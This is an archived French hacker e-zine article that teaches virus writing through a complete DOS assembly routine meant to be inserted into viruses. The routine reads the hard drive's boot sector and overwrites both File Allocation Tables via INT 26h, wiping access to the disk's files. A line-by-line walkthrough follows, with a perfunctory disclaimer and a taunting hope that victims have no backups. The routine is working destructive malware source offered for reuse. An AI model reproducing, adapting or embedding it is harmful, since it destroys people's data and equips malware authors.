Copy Link
Add to Bookmark
Report

N0RoUTE Issue 3-08 Get a ViRii maker

eZine's profile picture
Published in 
N0RoUTE
 · 4 years ago

  

Yo tous,

7 artikle devrair etre sur la programmation de Virus dans les divers
langages, mais on va kommenc avec l'Assembly (et je vais surement pas
kontinuer) ki est surement le + utilise dans le champ de la programmation
virale.

Dans 7 artikle je vous explikerais assez appronfonditement a ekrir un
Fat Fucker (Traduction: Un virus ki detruit la Fat). Je passe a une petite
lecon de base sur les choses necessaires a kapt ce Virus : Fat c l'acronime
de File Allocation table.

c 7 sorte de record ou database du sisteme operatif ou sont memorise les
files existant sur l'Hard Disk. Par la Fat le sisteme operatif
(toutes les referances seront vers sistemes operatif Microsoft tel dos
e superieurs) arrive a savoir dans kels cluster sont memorise les files ou
plutot kelle partie du file est memorisee dans un certain cluster. Dans
notre visur on utilisera des fonctions tres comunes a l' ASM (ce sera le
mot ki ramplaceras celui + long d'assembly.... g la fleme d'ecrire) kom les
jump, les registres e les locations de memoire.
Je n'appronfondirait pas
trop sur l'argument ASM, si vous avez besoin d'autre chose envoyez-moi un
E-mail.

Continuons avec la partie la + interessante, mais je dois d'abord vous dire
un truk, 7 sorgent ASM n'est pas un virus komplet, mais seulement une
routine ki pourra vous etre utile dans vos prochains virus. Au fait je dois
aussi fair un petit disclamer style : Je ne me retient pas responsable de ce
ke voua ferez avec le code ke je vais vous filer, ce virus a ete ecrit x
la culture generale...bla bla bla.

D'abord je vous filerez tout le code de la routine puis j'analiserais le
fonctions e leur but.

;Fat Fucker - Routine inserible dans les Virus evolues
;Ecrit par yawn member of alm & pqn
;Dedie a la meilleur H/P/V/C Zine frankophone
.model tiny
.code
public fatfucker
extrn car_sec: near

fatfucker:
push cx
push bp
push ax
push dx
mov ax, 0dh
int 21h
mov ah, 19h
int 21h
xor dx, dx
call car_sec
mov bp, bx
mov cx, es:[bp+16h]
add cx, cx
mov dx, 1
int 26h
pop dx
pop ax
pop bp
pop cx
ret
end fatfucker

Kommencons le kommentaire...
en ASM tout ce ki vient ecrit apres le caractere ";" est un kommentaire
e le kompilateur le ignorera ca sert seulement au programmateur x
avoir une meilleur klarte x tout ce ki regarde le code.
.model tiny
.code
public fatfucker

Ce sont des instructions donnees au kompilateur .model
definis kelle zone occupera le virus dans la memoire.
l'instruction .code declare le debut du code, public fatfucker
est le nom du prg.
Ne vous preoccupez pas extrn car_sec: near je l'ai pas oublie, j'explik apres.
fatfucker: deklare le dbut du code c pratikement un label ou une etiket
adopte par ce programme, dans les virus vous trouverez souve,nt main: ou
start: moi g mis fatfucker parce ke ca ca n'a pas ete projette komme une
routine primaire mais kom un module ki peux s'inserir dans un virus en
chair et en os.
push cx
push bp
push ax
push dx
c instructions je les ai ekrites x memoriser les valeurs kontenues
precedemment par c registres en memoire de facon a ne pas kompromettre avec
l'inserction de 7 routine le fonctionnement d'un virus
mov ax, 0dh
int 21h
c 2 instructins resettent le disk c a dir k'elles portent le pointeur de
l'hd de facon a repartir en une condition initiale en nous permettant
d'agir mieux sur le dispositif
mov ah, 19h
int 21h
c 2 instructions selektionnent le drive ou agir dans le tentatif d'effacer
la fat, + precisement avec 7 procedureje selectionne l'hd de default evitant
d'essayer d'effacer la fat d'un cd-rom o d'une disket
xor dx, dx
call car_sec
c 2 instructions chargent en memoire le boot sector e l'istruction
call car_sec appele extrn car_sec: near
donc l dit a l'assembleur de charger les secteur du boot.
mov bp, bx
mov cx, es:[bp+16h]
c 2 instructions revelent de kombien de secteurs sont formes les fat
(il fo rappeler ke les Fat du DOS sont 2 la principale et la sekondaires
exactement identikues, la seul diff c ke la primaire e utilise x toutes les
transitions sur l'hd alors ke la sekondaires se limite a fair un back up et
est utilise seulement en cas d'emergence; ca nous fait kpt kombien est
importante la Fatx un sisteme operatif, en effet si l devait disparaitre ou
etre efface on riskerais de perdre toute les infos kontenues dans notre Hard
Disk).
add cx, cx
mov dx, 1
int 26h
c 3 instruction rreecrivent les 2 Fat causant un dommage quasi irreparable,
en effet seulement des expert ou des kons avec un Back Up peuvent recuperer
le tout. x des motifs educatif je dois vous dir k'il existe des prg ki
resolve les prb causes par notre prg le Rescue ou le Sbabr mais y en a bcp
d'autres (esperons ke tous ceux ki le recoivent sooent des cons kom ca on
fait bon impressions =)).
pop dx
pop ax
pop bp
pop cx
ret
c 5 instructions repristinent le kontenu original des registres avant de
notre routione e la cmd ret declare ke le prg e finis
end fatfucker ferme la procedure fatfucker: c indispensable ke l'ouverture
coincide avec la fermeture sinon notre assemblateur nous donnera des msg
d'erreurs e notre prg non fonctionnera pas bien.
Bon g fini j'esperre ke cA vous sera utile en futur c vos kreations
e j'espere ke je ne vous ai pas trop ennuye si vous avez des
kommentaires ou des kestions (ou des konneries bien sur =) a me fsair
subir ecrivez une email a yawn@altern.org komme ca j'aurais kuelke chose a
faire a 4h du mat kand je me fais chier..
a la prochaine!
yawn^alm^pqn

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT